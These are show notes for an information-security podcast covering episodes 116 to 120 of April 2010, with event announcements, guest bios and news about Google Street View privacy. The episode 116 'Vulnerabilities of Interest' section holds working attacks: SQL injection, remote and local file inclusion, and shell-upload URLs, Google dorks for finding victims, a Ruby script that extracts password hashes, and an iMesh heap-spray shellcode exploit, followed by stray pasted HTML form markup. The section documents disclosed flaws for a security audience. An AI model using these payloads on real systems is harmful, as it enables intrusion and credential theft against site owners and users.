ISD Podcast Episode 120 for April 30, 2010. This podcast is our contribution back to the community where we will discuss the vulnerabilities of interest, information security related news hopefully providing you a few laughs and a little knowledge.
Announcements: MyHardDriveDied.com:
MHDD Data Recovery Class current dates and locations:
Jason Lawrence will also be putting on the SANS Mentor Forensics 508 – Computer Forensics and Investigations course in Sandy Springs starting Tuesday, June 22, 2010 – Tuesday, August 24, 2010 (http://www.sans.org/mentor/details.php?nid=21538). Use the Discount Code: isdpod15 for a 15% discount.
Atlanta ISSA:
ISSA Chapter is hosting a CISSP Workshop starting May 26 – August 14 (Preparing for the August 15, 2010 Exam) 6:00 to 9:00 PM 2 sessions per week, every Wednesday and Friday at the Clendenin Building, Kennesaw State University. The CISSP workshop is free of charge to Metro Atlanta ISSA members only. For further information, contact Ben Sholes, Director of Training, at: training@gaissa.org.
Hosting Second annual North Alabama Cyber Security Summit to be held on June 9th in Huntsville AL. Event is open to ISSA members at a discounted price ($35 full price is $50).
Friends of the Podcast:
Webhosting services:WebSpeedway
Interview with Jason Lawrence. Jason has been in the world of Security since 1996, supporting, designing and integrating Microsoft environments and diverse security infrastructures. He holds numerous industry certifications such as CISSP, CISA, GCFA and CEH. He has worked for a large Healthcare Provider in Israel as team lead in supporting and maintaining the organization’s system and security infrastructure. Currently he works for IBM Internet Security Systems as a Senior Support Engineer for the ISS product portfolio. Jason has also been involved with the ISSA for the past 6 years and currently is the Metro Atlanta Chapter’s Director of Communication. In his free time he mentors the SANS Forensics 508: Computer Forensic Investigations and Incident Response course.
ISD Podcast Episode 119 for April 29, 2010. This podcast is our contribution back to the community where we will discuss the vulnerabilities of interest, information security related news hopefully providing you a few laughs and a little knowledge.
Announcements: MyHardDriveDied.com:
MHDD Data Recovery Class current dates and locations:
Jason Lawrence will also be putting on the SANS Mentor Forensics 508 – Computer Forensics and Investigations course in Sandy Springs starting Tuesday, June 22, 2010 – Tuesday, August 24, 2010 (http://www.sans.org/mentor/details.php?nid=21538)
Atlanta ISSA:
ISSA Chapter is hosting a CISSP Workshop starting May 26 – August 14 (Preparing for the August 15, 2010 Exam) 6:00 to 9:00 PM 2 sessions per week, every Wednesday and Friday at the Clendenin Building, Kennesaw State University. The CISSP workshop is free of charge to Metro Atlanta ISSA members only. For further information, contact Ben Sholes, Director of Training, at: training@gaissa.org.
Hosting Second annual North Alabama Cyber Security Summit to be held on June 9th in Huntsville AL. Event is open to ISSA members at a discounted price ($35 full price is $50).
6.5 hour Metasploit class on May 8th 2010 from 10am to 4:30pm (http://www.irongeek.com/i.php?page=security/louisville-metasploit-class). So apparently, there's been some issues with the class RSVP's. As a result, they are working on either responding to the RSVP's, getting a bigger location or as a last result they may have to just say sorry to those that don't get in.
Friends of the Podcast: Webhosting services:WebSpeedway
Interview with Scott Moulton. Scott Moulton was the first person arrested for Port Scanning in January of 2000. During the defense, Scott found he had to train his lawyers on the technical aspects of computers in order to defend himself. This began his forensic computer career with a speciality in rebuilding hard drives for investigation purposes. Scott is the President at Forensic Strategy Services, LLC and the owner at My Hard Drive Died. Scott has presented at Shmoocon, OuterZ0ne, DEF CON, Toorcon as well as an active consistent speaker with the DEF CON 404 Local Chapter.
ISD Podcast Episode 118 for April 28, 2010. This podcast is our contribution back to the community where we will discuss the vulnerabilities of interest, information security related news hopefully providing you a few laughs and a little knowledge.
Announcements: MyHardDriveDied.com:
MHDD Data Recovery Class current dates and locations:
Jason Lawrence will also be putting on the SANS Mentor Forensics 508 – Computer Forensics and Investigations course in Sandy Springs starting Tuesday, June 22, 2010 – Tuesday, August 24, 2010 (http://www.sans.org/mentor/details.php?nid=21538)
Atlanta ISSA:
ISSA Chapter is hosting a CISSP Workshop starting May 26 – August 14 (Preparing for the August 15, 2010 Exam) 6:00 to 9:00 PM 2 sessions per week, every Wednesday and Friday at the Clendenin Building, Kennesaw State University. The CISSP workshop is free of charge to Metro Atlanta ISSA members only. For further information, contact Ben Sholes, Director of Training, at: training@gaissa.org.
Hosting Second annual North Alabama Cyber Security Summit to be held on June 9th in Huntsville AL. Event is open to ISSA members at a discounted price ($35 full price is $50).
Friends of the Podcast: Webhosting services:WebSpeedway
Interview with L. Taylor Banks who is the owner at KnowThreat and Administrator and PoC of the Atlanta DEF CON group DC404. Taylor has been a speaker at DEF CON, Black Hat, ShmooCon, LayerOne, and numerous private events. If you are interested in learning about computing, be sure to checkout Taylor's event Zero to Cloud in 48 Hours.
ISD Podcast Episode 117 for April 27, 2010. This podcast is our contribution back to the community where we will discuss the vulnerabilities of interest, information security related news hopefully providing you a few laughs and a little knowledge.
Announcements: MyHardDriveDied.com:
MHDD Data Recovery Class current dates and locations:
Jason Lawrence will also be putting on the SANS Mentor Forensics 508 – Computer Forensics and Investigations course in Sandy Springs starting Tuesday, June 22, 2010 – Tuesday, August 24, 2010 (http://www.sans.org/mentor/details.php?nid=21538)
ISSA Chapter is hosting a CISSP Workshop starting May 26 – August 14 (Preparing for the August 15, 2010 Exam) 6:00 to 9:00 PM 2 sessions per week, every Wednesday and Friday at the Clendenin Building, Kennesaw State University. The CISSP workshop is free of charge to Metro Atlanta ISSA members only. For further information, contact Ben Sholes, Director of Training, at: training@gaissa.org.
Hosting Second annual North Alabama Cyber Security Summit to be held on June 9th in Huntsville AL. Event is open to ISSA members at a discounted price ($35 full price is $50).
Friends of the Podcast: Webhosting services:WebSpeedway
Interview with Everett Washington Way Professional Services. Everett specializes in Security program building, with specific focus on Security Assessments and Audits. He has been instrumental in implementing Vulnerability and Risk Management Solutions. We get Everett to talk to us about his experiences and recommendations for building a successful Information Security program.
ISD Podcast Episode 116 for April 26, 2010. This podcast is our contribution back to the community where we will discuss the vulnerabilities of interest, information security related news hopefully providing you a few laughs and a little knowledge.
Announcements: MyHardDriveDied.com:
MHDD Data Recovery Class current dates and locations:
Jason Lawrence will also be putting on the SANS Mentor Forensics 508 – Computer Forensics and Investigations course in Sandy Springs starting Tuesday, June 22, 2010 – Tuesday, August 24, 2010 (http://www.sans.org/mentor/details.php?nid=21538)
ISSA Chapter is hosting a CISSP Workshop starting May 26 – August 14 (Preparing for the August 15, 2010 Exam) 6:00 to 9:00 PM 2 sessions per week, every Wednesday and Friday at the Clendenin Building, Kennesaw State University. The CISSP workshop is free of charge to Metro Atlanta ISSA members only. For further information, contact Ben Sholes, Director of Training, at: training@gaissa.org.
Hosting Second annual North Alabama Cyber Security Summit to be held on June 9th in Huntsville AL. Event is open to ISSA members at a discounted price ($35 full price is $50).
Friends of the Podcast: Webhosting services:WebSpeedway
Vulnerabilities of Interest:
Mp3 Online Id Tag Editor is subject to a Remote File Inclusion (RFI) vulnerability. Proof of Concept URLs are available: http://www.sample.com/mp3/velid3/module.archive.gzip.php?determined_format[include]=http://evil/exploit?
PhpMesFilms is subject to a SQL Injection vulnerability. Version 1.8 is impacted, though others may be as well. Proof of Concept URLs are available: http://www.sample.com/phpmesfilms_1.8/index.php?id=3+union+select+1,2,3,4,concat(user(),0x3a,@@version),6,7,8,9,10–
Multi-Mirror is subject to a Remote Upload vulnerability. Proof of Concept is available: Step 1 – http://www.sample.com/Multi-Mirror/ (Select Mirrors 2 upload file and select file 2 upload) Step 2 – http://www.sample.com/Multi-Mirror/temp_files (After Upload )
Mihalism Multi Host is subject to a Upload vulnerability. Version 4.0.0 is impacted, though others may be as well. Google Dork "inurl: Mihalis" Proof of Concept is available: Step 1 – http://www.sample.com/Mihalis/index.php (Use Tamper Data) Step 2 – http://www.sample.com/Mihalis/images/02j3gul0lkay3ggoz5ci.php (File Name)
Magic Uploader Mini is subject to a Upload vulnerability. Google Dork "inurl: miniuploader" Proof of Concept is available: Step 1 – http://www.sample.com/miniuploader/index.php (Use Tamper Data) Step 2 – http://www.sample.com/miniuploader/uploads/ (File Name)
Almnzm is subject to a SQL Injection vulnerability. Version older than 2.1 are impacted, though others may be as well. Example URL is available: http://www.sample.com/index.php?a=pages&id=3' and 1=0 UnIon aLL Select 1,2,concat(username,0x3a,password),4,5,6,7 from almnzm_customers–%20
Bild Flirt is subject to a SQL Injection vulnerability. Version older than 1.0 are impacted, though others may be as well. Exploit code is available: #!/usr/bin/ruby #4004-security-project.com #Discovered and vulnerability by Easy Laster print " ######################################################### # 4004-Security-Project # ######################################################### # Bild Flirt <= version 1.0 SQL Injection # # Exploit # # Using Host+Path+userid # # www.demo.de /bildflirt/ 1 # # Easy Laster # ######################################################### " require 'net/http' print "#########################################################" print "\nEnter host name (site.com)->" host=gets.chomp print "#########################################################" print "\nEnter script path (/forum/)->" path=gets.chomp print "#########################################################" print "\nEnter script path (userid)->" userid=gets.chomp print "#########################################################" begin dir = "index.php?id=999999999+and+1=0+union+select+concat(0×23,0×23,0×23,0×23,0×23,name,0×23,0×23,0×23,0×23,0×23)+from+bildf_user+where+user_id="+ userid +"–" http = Net::HTTP.new(host, 80) resp= http.get(path+dir) print "\nThe Username is -> "+(/#####(.+)#####/).match(resp.body)[1] dir = "index.php?id=999999999+and+1=0+union+select+concat(0×23,0×23,0×23,0×23,0×23,passwort,0×23,0×23,0×23,0×23,0×23)+from+bildf_user+where+user_id="+ userid +"–" http = Net::HTTP.new(host, 80) resp= http.get(path+dir) print "\nMD5 Password Hash is -> "+(/#####(.+)#####/).match(resp.body)[1] print "\n#########################################################" rescue print "\nExploit failed" end
YUI Images Script is subject to a Shell Upload vulnerability. Version 1.0 is impacted, though others may be as well. Google Dork "inurl: YUI-upload". Example URLs are available: http://www.sample.com/YUI-upload/html (Upload shell .php.giff) http://www.sample.com/YUI-upload/html/files/ (Your Shell.php.giff)
Opentel Openmairie tel is subject to a Local File Inclusion (LFI) vulnerability. Version 1.02 is impacted, though others may be as well. Google Dork "inurl: scr/soustab". Example URL is available: http://www.sample.com/scr/soustab.php?dsn[phptype]=../../../../../../../../etc/passwd%00
Openstock Facture is subject to a Local File Inclusion (LFI) vulnerability. Version 2.02 is impacted, though others may be as well. Google Dork "inurl: scr/soustab". Example URL is available: http://www.sample.com/scr/soustab.php?dsn[phptype]=../../../../../../../../etc/passwd%00
iMesh is subject to a Buffer Overflow vulnerability. Versions older than 7.1.0.x are impacted, though others may be as well. Exploit code is available: <html> <object classid='clsid:7C3B01BC-53A5-48A0-A43B-0C67731134B9' id='IMWebControl' /></object> <SCRIPT> //add su one, user: sun pass: tzu shellcode = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u3749%u4949%u4949%u4949%u4949%u4949%u4949%u4949%u5a51%u456a%u5058%u4230%u4231%u6b41%u4141%u3255%u4241%u3241%u4142%u4230%u5841%u3850%u4241%u6d75%u6b39%u494c%u5078%u3344%u6530%u7550%u4e50%u716b%u6555%u6c6c%u614b%u676c%u3175%u6568%u5a51%u4e4f%u306b%u564f%u4c78%u414b%u774f%u4450%u4841%u576b%u4c39%u664b%u4c54%u444b%u7841%u466e%u6951%u4f50%u6c69%u6b6c%u6f34%u3330%u6344%u6f37%u6a31%u646a%u474d%u4871%u7842%u4c6b%u6534%u716b%u5144%u6334%u7434%u5835%u6e65%u736b%u646f%u7364%u5831%u756b%u4c36%u644b%u624c%u6c6b%u634b%u656f%u574c%u7871%u4c6b%u774b%u4c6c%u464b%u7861%u4f6b%u7379%u516c%u3334%u6b34%u7073%u4931%u7550%u4e34%u536b%u3470%u4b70%u4f35%u7030%u4478%u4c4c%u414b%u5450%u4c4c%u624b%u6550%u6c4c%u6e6d%u626b%u6548%u6858%u336b%u6c39%u4f4b%u4e70%u5350%u3530%u4350%u6c30%u704b%u3568%u636c%u366f%u4b51%u5146%u7170%u4d46%u5a59%u6c58%u5943%u6350%u364b%u4230%u7848%u686f%u694e%u3170%u3370%u4d58%u6b48%u6e4e%u346a%u464e%u3937%u396f%u7377%u7053%u 426d%u6444%u756e%u5235%u3058%u6165%u4630%u654f%u3133%u7030%u706e%u3265%u7554%u7170%u7265%u5353%u7055%u5172%u5030%u4273%u3055%u616e%u4330%u7244%u515a%u5165%u5430%u526f%u5161%u3354%u3574%u7170%u5736%u4756%u7050%u306e%u7465%u4134%u7030%u706c%u316f%u7273%u6241%u614c%u4377%u6242%u524f%u3055%u6770%u3350%u7071%u3064%u516d%u4279%u324e%u7049%u5373%u5244%u4152%u3371%u3044%u536f%u4242%u6153%u5230%u4453%u5035%u756e%u3470%u506f%u6741%u7734%u4734%u4570"); bigblock = unescape("%u9090%u9090"); headersize = 20; slackspace = headersize+shellcode.length; while (bigblock.length<slackspace) bigblock+=bigblock; fillblock = bigblock.substring(0, slackspace); block = bigblock.substring(0, bigblock.length-slackspace); while(block.length+slackspace<0×40000) block = block+block+fillblock; memory = new Array(); for (i=0;i<77;i++){memory[i] = block+shellcode} bigblock = unescape("%u0707%u0707"); while (bigblock.length<slackspace) bigblock+=bigblock; fillblock = bigblock.substring(0, slackspace); block = bigblock.substring(0, bigblock.length-slackspace); while(block.length+slackspace<0×40000) block = block+block+fillblock; for (i=77;i<144;i++){memory[i] = block+shellcode} bigblock = unescape("%u0909%u0909"); while (bigblock.length<slackspace) bigblock+=bigblock; fillblock = bigblock.substring(0, slackspace); block = bigblock.substring(0, bigblock.length-slackspace); while(block.length+slackspace<0×40000) block = block+block+fillblock; for (i=144;i<500;i++){memory[i] = block+shellcode} </script> <script language='vbscript'> puf=218959117 'set ecx to 0x0d0d0d0d IMWebControl.SetHandler puf puf="" IMWebControl.ProcessRequestEx puf </script> </html> # milw0rm.com [2007-12-18] </textarea><br> Text File Extension:<br><input size=5 value="html"> <i>used at downloading</i><br><br> </span> <span id='pdf' style='display: none'> Attached File Name:<br><input name='filename' size=20 value=''> <i>file from 'papers' dir</i><br><br> </span> Application File Name:<br><input type="text" size=25 value="iMeshV7.exe"><br> MD5 of Application File:<br><input size=25 name="md5" value="0e0681816776e98c78432fcb4cd6f1cf"><br><br> <!–CVE:<br><input size=25 value=""><br><br>–> Verified: <input type="checkbox" value=1 checked ><br><br> <input type='submit' value="Save"> </form> <br> <h3>Codes of this record</h3> <table border=1> <tr><td>#<td>ID<td>OSVDB<td>CVE<td> <td> </tr> </table> <a href='?action=code_edit&mw_id=9477&back=9477&page=0&id_filter=9477&desc_filter=&platform_filter=&type_filter=&port_filter=&author_filter=&duplicates_filter=&verified_filter=&osvdb_filter=&cve_filter='>Add codes</a> <br>
Stories of Interest:
News item 1: http://www.theregister.co.uk/2010/04/22/google_streetview_logs_wlans/
Google's roving Street View spycam may blur your face, but it's got your number. The Street View service is under fire in Germany for scanning private WLAN networks, and recording users' unique Mac (Media Access Control) addresses, as the car trundles along. Germany's Federal Commissioner for Data Protection Peter Schaar says he's "horrified" by the discovery. "I am appalled… I call upon Google to delete previously unlawfully collected personal data on the wireless network immediately and stop the rides for Street View," according to German broadcaster ARD. Spooks have long desired the ability to cross reference the Mac address of a user's connection with their real identity and virtual identity, such as their Gmail or Facebook account. Other companies have logged broadcasting WLAN networks and published the information. By contrast Google has not published the WLAN map, or Street View in Germany; Google hopes to launch the service by the end of the year. At least since 2008 is publicly known that record companies like Skyhook equip test vehicles with Wi-Fi. The company offers its radio signals and mobile phone data for years with software developers. The company has mapped 80 million worldwide according to their own data Wi-Fi locations. To that point, the first iPhone used the Skyhook technology to determine the approximate location of the phone using a number of wireless signals. The major difference here is that Skyhook technology is not made public.
News item 2:http://www.guardian.co.uk/technology/2010/apr/20/google-google-street-view
Google has hit out at state attempts to clamp down on the internet by revealing governments' requests to remove data from the web and get information about users. Tonight it released a web page with a map showing country by country where it has had government requests or court orders to remove content from the YouTube video service or its search results, or to provide details about users of its services. The release of the tool, announced on its official blog, comes as it has had to counter complaints from data protection authorities in 10 countries, including the UK, that its Street View product, which provides pictures of public streets, and its ad-hoc social networking service Buzz "were launched without due consideration of privacy and data protection laws" and that Buzz in particular "betrayed a disappointing disregard for fundamental privacy norms". Details provided by Google cover requests between 1 July and 31 December 2009, and show that in the UK there were 1,166 requests for data about users and 59 requests to remove web pages in Google's services such as YouTube, or from its search results for the web. It complied with 45, or 76%, of the 59 requests, of which 43 were about YouTube videos. It does not specify which government agency – such as the police or others – made the request.
Support our show by clicking here before you make your purchases on Amazon. You pay the same price and it helps us offset the costs of doing the show. US visitors, please use the following:
UK visitors, please use the following:
Hosting Donations:
If you are unable to see any images above, turn off Ad Block.
